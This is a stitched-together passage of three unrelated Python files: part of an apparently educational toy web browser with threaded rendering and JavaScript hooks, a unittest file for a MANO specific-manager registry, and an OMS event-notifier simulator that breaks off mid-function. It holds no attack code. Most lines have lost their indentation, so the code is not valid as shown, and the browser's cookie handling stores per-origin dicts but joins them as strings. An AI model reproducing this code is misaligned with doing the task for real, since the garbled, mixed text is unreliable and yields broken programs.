child = BlockLayout(self.node, self)
self.children.append(child)
self.w = WIDTH
self.mt = self.bt = self.pt = 0
self.mr = self.br = self.pr = 0
self.mb = self.bb = self.pb = 0
self.ml = self.bl = self.pl = 0
child.size()
self.compute_height()
def compute_height(self):
self.h = self.children[0].h
def position(self):
child = self.children[0]
child.x = self.x = 0
child.y = self.y = 0
child.position()
def paint(self, to):
self.children[0].paint(to)
class DrawText:
def __init__(self, x1, y1, text, font, color):
self.x1 = x1
self.y1 = y1
self.text = text
self.font = font
self.color = color
        self.y2 = y1 + font.metrics("linespace")
def draw(self, scroll, canvas):
canvas.create_text(
self.x1, self.y1 - scroll,
text=self.text,
font=self.font,
fill=self.color,
anchor='nw',
)
class DrawRect:
def __init__(self, x1, y1, x2, y2, color):
self.x1 = x1
self.y1 = y1
self.x2 = x2
self.y2 = y2
self.color = color
def draw(self, scroll, canvas):
canvas.create_rectangle(
self.x1, self.y1 - scroll,
self.x2, self.y2 - scroll,
width=0,
fill=self.color,
)
def find_links(node, lst):
if not isinstance(node, ElementNode): return
if node.tag == "link" and \
node.attributes.get("rel", "") == "stylesheet" and \
"href" in node.attributes:
lst.append(node.attributes["href"])
for child in node.children:
find_links(child, lst)
return lst
def resolve_url(url, current):
if "://" in url:
return url
elif url.startswith("/"):
return "/".join(current.split("/")[:3]) + url
else:
return current.rsplit("/", 1)[0] + "/" + url
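# Worked examples (assumed current page "http://example.org/dir/page.html"):
#   resolve_url("http://other.org/x", current) -> "http://other.org/x" (already absolute)
#   resolve_url("/styles.css", current) -> "http://example.org/styles.css" (host-relative)
#   resolve_url("img/logo.png", current) -> "http://example.org/dir/img/logo.png" (path-relative)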
def find_layout(x, y, tree):
for child in reversed(tree.children):
result = find_layout(x, y, child)
if result: return result
if tree.x <= x < tree.x + tree.w and \
tree.y <= y < tree.y + tree.h:
return tree
def find_inputs(elt, out):
if not isinstance(elt, ElementNode): return
if elt.tag == "input" and "name" in elt.attributes:
out.append(elt)
for child in elt.children:
find_inputs(child, out)
return out
def find_scripts(node, out):
if not isinstance(node, ElementNode): return
if node.tag == "script" and \
"src" in node.attributes:
out.append(node.attributes["src"])
for child in node.children:
find_scripts(child, out)
return out
def find_selected(node, sel, out):
if not isinstance(node, ElementNode): return
if sel.matches(node):
out.append(node)
for child in node.children:
find_selected(child, sel, out)
return out
def layout_for_node(tree, node):
if tree.node == node:
return tree
for child in tree.children:
out = layout_for_node(child, node)
if out: return out
def is_link(node):
return isinstance(node, ElementNode) \
and node.tag == "a" and "href" in node.attributes
def drawHTMLTree(node, indent=0):
print(" "*indent, type(node).__name__, " ", node, sep="")
for child in node.children:
drawHTMLTree(child, indent + 2)
def drawLayoutTree(node, indent=0):
print(" "*indent, type(node).__name__, " ", node.node, sep="")
for child in node.children:
drawLayoutTree(child, indent + 2)
REFRESH_RATE_MS = 16 # 16ms
class Task:
def __init__(self, task_code, arg1=None, arg2=None):
self.task_code = task_code
self.arg1 = arg1
self.arg2 = arg2
self.__name__ = "task"
def __call__(self):
if self.arg2:
self.task_code(self.arg1, self.arg2)
elif self.arg1:
self.task_code(self.arg1)
else:
self.task_code()
# Prevent it accidentally running twice.
self.task_code = None
self.arg1 = None
self.arg2 = None
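# Usage sketch (assumed example): a Task freezes a callable plus up to two
# positional arguments so it can sit in a TaskQueue and be invoked later with no
# arguments, e.g.
#   t = Task(print, "hello")
#   t()  # runs print("hello"), then clears its references so it cannot run twice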
class TaskQueue:
def __init__(self, lock):
self.tasks = []
self.lock = lock
def add_task(self, task_code):
self.lock.acquire(blocking=True)
self.tasks.append(task_code)
self.lock.release()
def has_tasks(self):
self.lock.acquire(blocking=True)
retval = len(self.tasks) > 0
self.lock.release()
return retval
def get_next_task(self):
self.lock.acquire(blocking=True)
retval = self.tasks.pop(0)
self.lock.release()
return retval
class MainThreadRunner:
def __init__(self, browser):
self.lock = threading.Lock()
self.browser = browser
self.needs_animation_frame = False
self.main_thread = threading.Thread(target=self.run, args=())
self.script_tasks = TaskQueue(self.lock)
self.browser_tasks = TaskQueue(self.lock)
def schedule_animation_frame(self):
self.lock.acquire(blocking=True)
self.needs_animation_frame = True
self.lock.release()
def schedule_script_task(self, script):
self.script_tasks.add_task(script)
def schedule_browser_task(self, callback):
self.browser_tasks.add_task(callback)
    def schedule_event_handler(self):
pass
def start(self):
self.main_thread.start()
def run(self):
while True:
self.lock.acquire(blocking=True)
needs_animation_frame = self.needs_animation_frame
self.lock.release()
if needs_animation_frame:
                self.browser.run_animation_frame()
self.browser.commit()
browser_method = None
if self.browser_tasks.has_tasks():
browser_method = self.browser_tasks.get_next_task()
if browser_method:
browser_method()
script = None
if self.script_tasks.has_tasks():
script = self.script_tasks.get_next_task()
if script:
script()
time.sleep(0.001) # 1ms
class Browser:
def __init__(self):
self.window = tkinter.Tk()
self.canvas = tkinter.Canvas(
self.window,
width=WIDTH,
height=HEIGHT
)
self.canvas.pack()
self.cookies = {}
self.history = []
self.focus = None
self.address_bar = ""
self.scroll = 0
self.display_list = []
self.draw_display_list = []
self.needs_draw = False
self.document = None
self.main_thread_timer = Timer()
self.compositor_thread_timer = Timer()
self.window.bind("<Down>", self.scrolldown)
self.window.bind("<Button-1>", self.compositor_handle_click)
self.window.bind("<Key>", self.compositor_keypress)
self.window.bind("<Return>", self.press_enter)
self.reflow_roots = []
self.needs_layout_tree_rebuild = False
self.needs_animation_frame = False
self.display_scheduled = False
self.needs_raf_callbacks = False
self.frame_count = 0
self.compositor_lock = threading.Lock()
self.needs_quit = False
def commit(self):
self.compositor_lock.acquire(blocking=True)
self.needs_draw = True
self.draw_display_list = self.display_list.copy()
self.compositor_lock.release()
def start(self):
self.main_thread_runner = MainThreadRunner(self)
self.main_thread_runner.start()
self.canvas.after(1, self.maybe_draw)
def maybe_draw(self):
self.compositor_lock.acquire(blocking=True)
if self.needs_quit:
sys.exit()
if self.needs_animation_frame and not self.display_scheduled:
self.canvas.after(
REFRESH_RATE_MS,
self.main_thread_runner.schedule_animation_frame)
self.display_scheduled = True
if self.needs_draw:
self.draw()
self.needs_draw = False
self.compositor_lock.release()
self.canvas.after(1, self.maybe_draw)
# Runs on the compositor thread
def compositor_handle_click(self, e):
self.focus = None
if e.y < 60:
# Browser chrome clicks can be handled without the main thread...
if 10 <= e.x < 35 and 10 <= e.y < 50:
self.go_back()
elif 50 <= e.x < 790 and 10 <= e.y < 50:
self.focus = "address bar"
self.address_bar = ""
self.set_needs_animation_frame()
else:
# ...but not clicks within the web page contents area
self.main_thread_runner.schedule_browser_task(
Task(self.handle_click, e))
# Runs on the main thread
def handle_click(self, e):
# Lock to check scroll, which is updated on the compositor thread.
self.compositor_lock.acquire(blocking=True)
x, y = e.x, e.y + self.scroll - 60
self.compositor_lock.release()
self.run_rendering_pipeline()
obj = find_layout(x, y, self.document)
if not obj: return
elt = obj.node
if elt and self.dispatch_event("click", elt): return
while elt:
if isinstance(elt, TextNode):
pass
elif is_link(elt):
url = resolve_url(elt.attributes["href"], self.url)
return self.schedule_load(url)
elif elt.tag == "input":
elt.attributes["value"] = ""
self.focus = obj
self.set_needs_reflow(self.focus)
elif elt.tag == "button":
self.submit_form(elt)
elt = elt.parent
# Runs on the compositor thread
def compositor_keypress(self, e):
if len(e.char) == 0: return
if not (0x20 <= ord(e.char) < 0x7f): return
if not self.focus:
return
elif self.focus == "address bar":
self.address_bar += e.char
self.set_needs_animation_frame()
else:
self.main_thread_runner.schedule_browser_task(
Task(self.keypress, e))
# Runs on the main thread
def keypress(self, e):
self.focus.node.attributes["value"] += e.char
self.dispatch_event("change", self.focus.node)
self.set_needs_reflow(self.focus)
def submit_form(self, elt):
while elt and elt.tag != "form":
elt = elt.parent
if not elt: return
if self.dispatch_event("submit", elt): return
inputs = find_inputs(elt, [])
body = ""
for input in inputs:
name = input.attributes["name"]
value = input.attributes.get("value", "")
body += "&" + name + "=" + value.replace(" ", "%20")
body = body[1:]
url = resolve_url(elt.attributes["action"], self.url)
self.schedule_load(url, body)
# Runs on the compositor thread
def press_enter(self, e):
if self.focus == "address bar":
self.focus = None
self.schedule_load(self.address_bar)
def go_back(self):
if len(self.history) > 1:
self.history.pop()
back = self.history.pop()
self.schedule_load(back)
def cookie_string(self):
cookie_string = ""
for key, value in self.cookies.items():
cookie_string += "&" + key + "=" + value
return cookie_string[1:]
# Runs on the compositor thread
def schedule_load(self, url, body=None):
self.main_thread_runner.schedule_browser_task(
Task(self.load, url, body))
# Runs on the main thread
def load(self, url, body=None):
if args.compute_main_thread_timings:
self.main_thread_timer.start("Downloading")
self.address_bar = url
self.url = url
self.history.append(url)
req_headers = { "Cookie": self.cookie_string() }
headers, body = request(url, headers=req_headers, payload=body)
if "set-cookie" in headers:
kv, params = headers["set-cookie"].split(";", 1)
key, value = kv.split("=", 1)
origin = url_origin(self.history[-1])
self.cookies.setdefault(origin, {})[key] = value
if args.compute_main_thread_timings:
self.main_thread_timer.start("Parsing HTML")
self.nodes = parse(lex(body))
# drawHTMLTree(self.nodes)
if args.compute_main_thread_timings:
self.main_thread_timer.start("Parsing CSS")
with open("browser8.css") as f:
self.rules = CSSParser(f.read()).parse()
for link in find_links(self.nodes, []):
header, body = request(resolve_url(link, url), headers=req_headers)
self.rules.extend(CSSParser(body).parse())
self.rules.sort(key=lambda x: x[0].priority())
self.rules.reverse()
self.run_scripts()
self.set_needs_layout_tree_rebuild()
def load_scripts(self, scripts):
req_headers = { "Cookie": self.cookie_string() }
for script in find_scripts(self.nodes, []):
header, body = request(
resolve_url(script, self.history[-1]), headers=req_headers)
scripts.append([header, body])
def script_run_wrapper(self, script_text):
return Task(self.js.evaljs, script_text)
def run_scripts(self):
if args.compute_main_thread_timings:
self.main_thread_timer.start("Running JS")
self.setup_js()
scripts=[]
self.load_scripts(scripts)
for [header, body] in scripts:
self.main_thread_runner.schedule_script_task(
self.script_run_wrapper(body))
def setup_js(self):
self.js = dukpy.JSInterpreter()
self.node_to_handle = {}
self.handle_to_node = {}
self.js.export_function("log", print)
self.js.export_function("querySelectorAll", self.js_querySelectorAll)
self.js.export_function("getAttribute", self.js_getAttribute)
self.js.export_function("innerHTML", self.js_innerHTML)
self.js.export_function("cookie", self.cookie_string)
self.js.export_function(
"requestAnimationFrame",
self.js_requestAnimationFrame)
self.js.export_function("now", self.js_now)
with open("runtime13.js") as f:
self.main_thread_runner.schedule_script_task(
self.script_run_wrapper(f.read()))
def js_querySelectorAll(self, sel):
selector, _ = CSSParser(sel + "{").selector(0)
elts = find_selected(self.nodes, selector, [])
return [self.make_handle(elt) for elt in elts]
def js_getAttribute(self, handle, attr):
elt = self.handle_to_node[handle]
return elt.attributes.get(attr, None)
def js_innerHTML(self, handle, s):
try:
self.run_rendering_pipeline()
doc = parse(lex("<!doctype><html><body>" +
s + "</body></html>"))
new_nodes = doc.children[0].children
elt = self.handle_to_node[handle]
elt.children = new_nodes
for child in elt.children:
child.parent = elt
if self.document:
self.set_needs_reflow(
layout_for_node(self.document, elt))
else:
self.set_needs_layout_tree_rebuild()
except:
import traceback
traceback.print_exc()
raise
def js_requestAnimationFrame(self):
self.needs_raf_callbacks = True
self.set_needs_animation_frame()
def js_now(self):
return int(time.time() * 1000)
def dispatch_event(self, type, elt):
handle = self.node_to_handle.get(elt, -1)
do_default = self.js.evaljs("__runHandlers({}, \"{}\")".format(handle, type))
return not do_default
def make_handle(self, elt):
if elt not in self.node_to_handle:
handle = len(self.node_to_handle)
self.node_to_handle[elt] = handle
self.handle_to_node[handle] = elt
else:
handle = self.node_to_handle[elt]
return handle
def set_needs_reflow(self, layout_object):
self.reflow_roots.append(layout_object)
self.set_needs_animation_frame()
def set_needs_layout_tree_rebuild(self):
self.needs_layout_tree_rebuild = True
self.set_needs_animation_frame()
def set_needs_animation_frame(self):
self.compositor_lock.acquire(blocking=True)
if not self.display_scheduled:
self.needs_animation_frame = True
self.compositor_lock.release()
def quit(self):
self.compositor_lock.acquire(blocking=True)
self.needs_quit = True
        self.compositor_lock.release()
def run_animation_frame(self):
self.needs_animation_frame = False
if args.compute_main_thread_timings:
self.main_thread_timer.reset()
if (self.needs_raf_callbacks):
self.needs_raf_callbacks = False
if args.compute_main_thread_timings:
self.main_thread_timer.start("runRAFHandlers")
self.js.evaljs("__runRAFHandlers()")
self.run_rendering_pipeline()
# This will cause a draw to the screen, even if there are pending
# requestAnimationFrame callbacks for the *next* frame (which may have
# been registered during a call to __runRAFHandlers). By default,
# tkinter doesn't run these until there are no more event queue
# tasks.
if args.compute_main_thread_timings:
self.main_thread_timer.start("IdleTasks")
self.canvas.update_idletasks()
if args.compute_main_thread_timings:
self.main_thread_timer.stop()
self.main_thread_timer.print_accumulated()
self.frame_count = self.frame_count + 1
if args.stop_after > 0 and self.frame_count > args.stop_after:
self.quit()
sys.exit()
def run_rendering_pipeline(self):
if self.needs_layout_tree_rebuild:
self.document = DocumentLayout(self.nodes)
self.reflow_roots = [self.document]
self.needs_layout_tree_rebuild = False
for reflow_root in self.reflow_roots:
self.reflow(reflow_root)
self.reflow_roots = []
self.paint()
self.max_y = self.document.h - HEIGHT
# drawLayoutTree(self.document)
def paint(self):
if args.compute_main_thread_timings:
self.main_thread_timer.start("Paint")
self.display_list = []
self.document.paint(self.display_list)
def reflow(self, obj):
if args.compute_main_thread_timings:
self.main_thread_timer.start("Style")
style(obj.node, None, self.rules)
if args.compute_main_thread_timings:
self.main_thread_timer.start("Layout (phase 1A)")
obj.size()
if args.compute_main_thread_timings:
self.main_thread_timer.start("Layout (phase 1B)")
while obj.parent:
obj.parent.compute_height()
obj = obj.parent
if args.compute_main_thread_timings:
self.main_thread_timer.start("Layout (phase 2)")
self.document.position()
def draw(self):
if args.compute_compositor_thread_timings:
self.compositor_thread_timer.reset()
self.compositor_thread_timer.start("Draw")
self.canvas.delete("all")
for cmd in self.draw_display_list:
if cmd.y1 > self.scroll + HEIGHT - 60: continue
if cmd.y2 < self.scroll: continue
cmd.draw(self.scroll - 60, self.canvas)
if args.compute_compositor_thread_timings:
            self.compositor_thread_timer.start("Draw Chrome")
self.canvas.create_rectangle(0, 0, 800, 60, width=0, fill='light gray')
self.canvas.create_rectangle(50, 10, 790, 50)
font = tkinter.font.Font(family="Courier", size=30)
self.canvas.create_text(55, 15, anchor='nw', text=self.address_bar, font=font)
self.canvas.create_rectangle(10, 10, 35, 50)
self.canvas.create_polygon(15, 30, 30, 15, 30, 45, fill='black')
if self.focus == "address bar":
w = font.measure(self.address_bar)
self.canvas.create_line(55 + w, 15, 55 + w, 45)
elif isinstance(self.focus, InputLayout):
text = self.focus.node.attributes.get("value", "")
x = self.focus.x + self.focus.font.measure(text)
y = self.focus.y - self.scroll + 60
self.canvas.create_line(x, y, x, y + self.focus.h)
if args.compute_compositor_thread_timings:
self.compositor_thread_timer.stop()
self.compositor_thread_timer.print_accumulated()
# Runs on the compositor thread
def scrolldown(self, e):
self.compositor_lock.acquire(blocking=True)
self.scroll = self.scroll + SCROLL_STEP
self.scroll = min(self.scroll, self.max_y)
self.scroll = max(0, self.scroll)
self.compositor_lock.release()
self.set_needs_animation_frame()
if __name__ == "__main__":
import sys
parser = argparse.ArgumentParser(description="Chapter 13 source code")
    parser.add_argument("--url", type=str, required=True,
        help="URL to load")
    parser.add_argument("--stop_after", default=0, type=int,
        help="If set, exits the browser after this many generated frames")
    parser.add_argument("--compute_main_thread_timings", action="store_true",
        help="Compute main thread timings")
    parser.add_argument("--compute_compositor_thread_timings", action="store_true",
        help="Compute compositor thread timings")
args = parser.parse_args()
browser = Browser()
browser.start()
browser.schedule_load(args.url)
tkinter.mainloop()
|
test_smr.py
|
import logging
import threading
import time
import unittest
from multiprocessing import Process
from test.instantiation import fakeslm_instantiation
from test.onboarding import fakeslm_onboarding
from test.terminating import fakeslm_termination
from test.updating import fakeslm_updating
from manobase.messaging import ManoBrokerRequestResponseConnection, Message
from smr.main import SpecificManagerRegistry
logging.basicConfig(level=logging.INFO)
LOG = logging.getLogger("mano-plugins:smr_test")
LOG.setLevel(logging.INFO)
class test_SMR_functionalities(unittest.TestCase):
@classmethod
def setUpClass(cls):
cls.smr_proc = Process(target=SpecificManagerRegistry)
cls.smr_proc.daemon = True
cls.manoconn = ManoBrokerRequestResponseConnection(
"son-plugin.SpecificManagerRegistry"
)
cls.wait_for_ssm_event = threading.Event()
cls.wait_for_ssm_event.clear()
cls.wait_for_fsm_event = threading.Event()
cls.wait_for_fsm_event.clear()
cls.event1 = False
cls.event2 = False
cls.smr_proc.start()
time.sleep(4)
@classmethod
def tearDownClass(cls):
if cls.smr_proc is not None:
cls.smr_proc.terminate()
del cls.smr_proc
try:
cls.manoconn.stop_connection()
except Exception as e:
LOG.exception("Stop connection exception.")
del cls.wait_for_fsm_event
del cls.wait_for_ssm_event
def ssm_eventFinished(self):
self.wait_for_ssm_event.set()
def waitForSSMEvent(self, timeout=5, msg="Event timed out."):
if not self.wait_for_ssm_event.wait(timeout):
self.assertEqual(True, False, msg=msg)
def fsm_eventFinished(self):
self.wait_for_fsm_event.set()
def waitForFSMEvent(self, timeout=5, msg="Event timed out."):
if not self.wait_for_fsm_event.wait(timeout):
self.assertEqual(True, False, msg=msg)
def test_1_SMR_onboard(self):
self.event1 = False
self.event2 = False
def on_ssm_onboarding_result(message: Message):
if message.app_id == "son-plugin.SpecificManagerRegistry":
result = message.payload
self.assertTrue(
list(result.keys())
== ["sonssmservice1dumb1", "sonssmservice1placement1"]
or list(result.keys())
== ["sonssmservice1placement1", "sonssmservice1dumb1"],
msg="not all SSMs results received",
)
self.assertTrue(
result["sonssmservice1dumb1"]["status"] == "On-boarded",
                    msg="error in onboarding sonssmservice1dumb1",
)
self.assertTrue(
result["sonssmservice1dumb1"]["error"] == "None",
                    msg="error in onboarding sonssmservice1dumb1",
)
self.assertTrue(
result["sonssmservice1placement1"]["status"] == "On-boarded",
                    msg="error in onboarding sonssmservice1placement1",
)
self.assertTrue(
result["sonssmservice1placement1"]["error"] == "None",
                    msg="error in onboarding sonssmservice1placement1",
)
self.ssm_eventFinished()
def on_fsm_onboarding_result(message: Message):
if message.app_id == "son-plugin.SpecificManagerRegistry":
result = message.payload
if list(result.keys()) == ["sonfsmservice1function1dumb1"]:
self.assertTrue(
list(result.keys()) == ["sonfsmservice1function1dumb1"],
msg="not all FSMs results in VNFD1 received",
)
self.assertTrue(
result["sonfsmservice1function1dumb1"]["status"]
== "On-boarded",
                        msg="error in onboarding sonfsmservice1function1dumb1",
)
self.assertTrue(
result["sonfsmservice1function1dumb1"]["error"] == "None",
                        msg="error in onboarding sonfsmservice1function1dumb1",
)
self.event1 = True
else:
self.assertTrue(
list(result.keys())
== [
"sonfsmservice1function1monitoring1",
"sonfsmservice1firewallconfiguration1",
]
or list(result.keys())
== [
"sonfsmservice1firewallconfiguration1",
"sonfsmservice1function1monitoring1",
],
msg="not all FSMs results in VNFD2 received",
)
self.assertTrue(
result["sonfsmservice1function1monitoring1"]["status"]
== "On-boarded",
                        msg="error in onboarding sonfsmservice1function1monitoring1",
)
self.assertTrue(
result["sonfsmservice1function1monitoring1"]["error"] == "None",
                        msg="error in onboarding sonfsmservice1function1monitoring1",
)
self.assertTrue(
result["sonfsmservice1firewallconfiguration1"]["status"]
== "On-boarded",
                        msg="error in onboarding sonfsmservice1firewallconfiguration1",
)
self.assertTrue(
result["sonfsmservice1firewallconfiguration1"]["error"]
== "None",
                        msg="error in onboarding sonfsmservice1firewallconfiguration1",
)
self.event2 = True
                if self.event1 and self.event2:
self.fsm_eventFinished()
self.manoconn.subscribe(
on_ssm_onboarding_result, "specific.manager.registry.ssm.on-board"
)
self.manoconn.subscribe(
on_fsm_onboarding_result, "specific.manager.registry.fsm.on-board"
)
        onboarding_proc = Process(target=fakeslm_onboarding)
        onboarding_proc.daemon = True
        onboarding_proc.start()
        self.waitForSSMEvent(timeout=70, msg="SSM Onboarding request not received.")
        self.waitForFSMEvent(timeout=70, msg="FSM Onboarding request not received.")
        self.wait_for_fsm_event.clear()
        self.wait_for_ssm_event.clear()
        onboarding_proc.terminate()
        del onboarding_proc
def test_2_SMR_instantiation(self):
self.event1 = False
self.event2 = False
def on_ssm_instantiation_result(message: Message):
if message.app_id == "son-plugin.SpecificManagerRegistry":
result = message.payload
self.assertTrue(
list(result.keys())
== ["sonssmservice1dumb1", "sonssmservice1placement1"]
or list(result.keys())
== ["sonssmservice1placement1", "sonssmservice1dumb1"],
msg="not all SSMs results received",
)
self.assertTrue(
result["sonssmservice1dumb1"]["status"] == "Instantiated",
msg="error in instantiation sonssmservice1dumb1",
)
self.assertTrue(
result["sonssmservice1dumb1"]["error"] == "None",
msg="error in instantiation sonssmservice1dumb1",
)
self.assertTrue(
result["sonssmservice1placement1"]["status"] == "Instantiated",
msg="error in instantiation sonssmservice1placement1",
)
self.assertTrue(
result["sonssmservice1placement1"]["error"] == "None",
msg="error in instantiation sonssmservice1placement1",
)
self.ssm_eventFinished()
def on_fsm_instantiation_result(message: Message):
if message.app_id == "son-plugin.SpecificManagerRegistry":
result = message.payload
if list(result.keys()) == ["sonfsmservice1function1dumb1"]:
self.assertTrue(
list(result.keys()) == ["sonfsmservice1function1dumb1"],
msg="not all FSMs instantiation results in VNFD1 received",
)
self.assertTrue(
result["sonfsmservice1function1dumb1"]["status"]
== "Instantiated",
msg="error in instantiation sonfsmservice1function1dumb1",
)
self.assertTrue(
result["sonfsmservice1function1dumb1"]["error"] == "None",
msg="error in instantiation sonfsmservice1function1dumb1",
)
self.event1 = True
else:
self.assertTrue(
list(result.keys())
== [
"sonfsmservice1function1monitoring1",
"sonfsmservice1firewallconfiguration1",
]
or list(result.keys())
== [
"sonfsmservice1firewallconfiguration1",
"sonfsmservice1function1monitoring1",
],
msg="not all FSMs instantiation results in VNFD2 received",
)
self.assertTrue(
result["sonfsmservice1function1monitoring1"]["status"]
== "Instantiated",
msg="error in instantiation sonfsmservice1function1monitoring1",
)
self.assertTrue(
result["sonfsmservice1function1monitoring1"]["error"] == "None",
msg="error in instantiation sonfsmservice1function1monitoring1",
)
self.assertTrue(
result["sonfsmservice1firewallconfiguration1"]["status"]
== "Instantiated",
msg="error in instantiation sonfsmservice1firewallconfiguration1",
)
self.assertTrue(
result["sonfsmservice1firewallconfiguration1"]["error"]
== "None",
msg="error in instantiation sonfsmservice1firewallconfiguration1",
)
self.event2 = True
if self.event1 and self.event2:
self.fsm_eventFinished()
self.manoconn.subscribe(
on_ssm_instantiation_result, "specific.manager.registry.ssm.instantiate"
)
self.manoconn.subscribe(
on_fsm_instantiation_result, "specific.manager.registry.fsm.instantiate"
)
instantiation_proc = Process(target=fakeslm_instantiation)
instantiation_proc.daemon = True
instantiation_proc.start()
self.waitForSSMEvent(timeout=70, msg="SSM instantiation request not received.")
self.waitForFSMEvent(timeout=70, msg="FSM instantiation request not received.")
self.wait_for_ssm_event.clear()
self.wait_for_fsm_event.clear()
instantiation_proc.terminate()
del instantiation_proc
def test_3_SMR_update(self):
def on_ssm_updating_result(message: Message):
if message.app_id == "son-plugin.SpecificManagerRegistry":
result = message.payload
self.assertTrue(
list(result.keys()) == ["sonssmservice1dumb1"],
msg="not all SSMs results received",
)
self.assertTrue(
result["sonssmservice1dumb1"]["status"] == "Updated",
                    msg="error in updating status field sonssmservice1dumb1",
)
self.assertTrue(
result["sonssmservice1dumb1"]["error"] == "None",
                    msg="error in updating error field sonssmservice1dumb1",
)
self.ssm_eventFinished()
def on_fsm_updating_result(message: Message):
if message.app_id == "son-plugin.SpecificManagerRegistry":
result = message.payload
self.assertTrue(
list(result.keys()) == ["sonfsmservice1function1updateddumb1"],
msg="not all FSMs updating results in VNFD2 received",
)
self.assertTrue(
result["sonfsmservice1function1updateddumb1"]["status"]
== "Updated",
                    msg="error in updating sonfsmservice1function1updateddumb1",
)
self.assertTrue(
result["sonfsmservice1function1updateddumb1"]["error"] == "None",
                    msg="error in updating sonfsmservice1function1updateddumb1",
)
self.fsm_eventFinished()
self.manoconn.subscribe(
on_ssm_updating_result, "specific.manager.registry.ssm.update"
)
self.manoconn.subscribe(
on_fsm_updating_result, "specific.manager.registry.fsm.update"
)
updating_proc = Process(target=fakeslm_updating)
updating_proc.daemon = True
updating_proc.start()
self.waitForSSMEvent(timeout=70, msg="SSM updating request not received.")
self.waitForFSMEvent(timeout=70, msg="FSM updating request not received.")
self.wait_for_fsm_event.clear()
self.wait_for_ssm_event.clear()
updating_proc.terminate()
del updating_proc
def test_4_SMR_terminate(self):
self.event1 = False
self.event2 = False
def on_ssm_termination_result(message: Message):
if message.app_id == "son-plugin.SpecificManagerRegistry":
result = message.payload
self.assertTrue(
list(result.keys())
== ["sonssmservice1dumb1", "sonssmservice1placement1"]
                    or list(result.keys())
                    == ["sonssmservice1placement1", "sonssmservice1dumb1"],
msg="not all SSMs results received",
)
self.assertTrue(
result["sonssmservice1dumb1"]["status"] == "Terminated",
msg="error in termination status field sonssmservice1dumb1",
)
self.assertTrue(
result["sonssmservice1dumb1"]["error"] == "None",
msg="error in termination error field sonssmservice1dumb1",
)
self.assertTrue(
result["sonssmservice1placement1"]["status"] == "Terminated",
msg="error in termination status field sonssmservice1placement1",
)
self.assertTrue(
result["sonssmservice1placement1"]["error"] == "None",
msg="error in termination error field sonssmservice1placement1",
)
self.ssm_eventFinished()
def on_fsm_termination_result(message: Message):
if message.app_id == "son-plugin.SpecificManagerRegistry":
result = message.payload
if list(result.keys()) == ["sonfsmservice1function1dumb1"]:
self.assertTrue(
result["sonfsmservice1function1dumb1"]["status"]
== "Terminated",
msg="error in termination status field sonfsmservice1function1dumb1",
)
self.assertTrue(
result["sonfsmservice1function1dumb1"]["error"] == "None",
msg="error in termination error field sonfsmservice1function1dumb1",
)
self.event1 = True
else:
self.assertTrue(
list(result.keys())
== [
"sonfsmservice1function1monitoring1",
"sonfsmservice1function1updateddumb1",
]
or list(result.keys())
== [
"sonfsmservice1function1updateddumb1",
"sonfsmservice1function1monitoring1",
],
                        msg="not all FSMs termination results in VNFD2 received",
)
self.assertTrue(
result["sonfsmservice1function1monitoring1"]["status"]
== "Terminated",
msg="error in termination status field sonfsmservice1function1monitoring1",
)
self.assertTrue(
result["sonfsmservice1function1monitoring1"]["error"] == "None",
msg="error in termination error field sonfsmservice1function1monitoring1",
)
self.assertTrue(
result["sonfsmservice1function1updateddumb1"]["status"]
== "Terminated",
msg="error in termination status field sonfsmservice1function1updateddumb1",
)
self.assertTrue(
result["sonfsmservice1function1updateddumb1"]["error"]
== "None",
msg="error in termination error field sonfsmservice1function1updateddumb1",
)
self.event2 = True
if self.event1 and self.event2:
self.fsm_eventFinished()
self.manoconn.subscribe(
on_ssm_termination_result, "specific.manager.registry.ssm.terminate"
)
self.manoconn.subscribe(
on_fsm_termination_result, "specific.manager.registry.fsm.terminate"
)
termination_proc = Process(target=fakeslm_termination)
termination_proc.daemon = True
termination_proc.start()
self.waitForSSMEvent(timeout=70, msg="SSM termination request not received.")
self.waitForFSMEvent(timeout=70, msg="FSM termination request not received.")
self.wait_for_fsm_event.clear()
self.wait_for_ssm_event.clear()
termination_proc.terminate()
del termination_proc
if __name__ == "__main__":
unittest.main()
|
oms_events.py
|
#!/usr/bin/env python
"""
@package ion.agents.platform.rsn.simulator.oms_events
@file ion/agents/platform/rsn/simulator/oms_events.py
@author Carlos Rueda
@brief OMS simulator event definitions and supporting functions.
A demo program is included that allows running both a listener server and a
notifier. See the demo program usage at the end of this file.
"""
__author__ = 'Carlos Rueda'
import httplib
import json
import sys
from time import sleep
import time
from urlparse import urlparse
import ntplib
import yaml
from ion.agents.platform.rsn.simulator.logger import Logger
log = Logger.get_logger()
if not getattr(log, "trace", None):
setattr(log, "trace", log.debug)
##########################################################################
# The "event type" concept was removed from the interface (~Apr/2013).
# To minimize changes in the code, simply introduce an 'ALL' event type here.
class EventInfo(object):
EVENT_TYPES = {
'ALL': {
'name': 'on battery',
'severity': 3,
'group': 'power',
}
}
class EventNotifier(object):
def __init__(self):
# _listeners: { event_type: {url: reg_time, ...}, ... }
# initialize with empty dict for each event type:
self._listeners = dict((et, {}) for et in EventInfo.EVENT_TYPES)
def add_listener(self, url, event_type):
assert event_type in EventInfo.EVENT_TYPES
url_dict = self._listeners[event_type]
        if url not in url_dict:
url_dict[url] = ntplib.system_to_ntp_time(time.time())
log.trace("added listener=%s for event_type=%s", url, event_type)
return url_dict[url]
def remove_listener(self, url, event_type):
assert event_type in EventInfo.EVENT_TYPES
url_dict = self._listeners[event_type]
unreg_time = 0
if url in url_dict:
unreg_time = ntplib.system_to_ntp_time(time.time())
del url_dict[url]
log.trace("removed listener=%s for event_type=%s", url, event_type)
return unreg_time
def notify(self, event_instance):
"""
Notifies the event to all associated listeners.
"""
assert isinstance(event_instance, dict)
urls = self._listeners['ALL']
if not len(urls):
# no event listeners for event_type; just ignore notification:
return
# copy list to get a snapshot of the current dictionary and thus avoid
# concurrent modification kind of runtime errors like:
# RuntimeError: dictionary changed size during iteration
urls = list(urls)
for url in urls:
self._notify_listener(url, event_instance)
def _notify_listener(self, url, event_instance):
"""
Notifies event to given listener.
"""
if url == "http://NO_OMS_NOTIFICATIONS": # pragma: no cover
# developer convenience -see ion.agents.platform.rsn.oms_event_listener
return
log.debug("Notifying event_instance=%s to listener=%s", str(event_instance), url)
# include url in event instance for diagnostic/debugging purposes:
event_instance['listener_url'] = url
# prepare payload (array of event instances in JSON format):
payload = json.dumps([event_instance], indent=2)
log.trace("payload=\n%s", payload)
headers = {
"Content-type": "application/json",
"Accept": "text/plain"
}
conn = None
try:
o = urlparse(url)
url4conn = o.netloc
path = o.path
conn = httplib.HTTPConnection(url4conn)
conn.request("POST", path, body=payload, headers=headers)
response = conn.getresponse()
data = response.read()
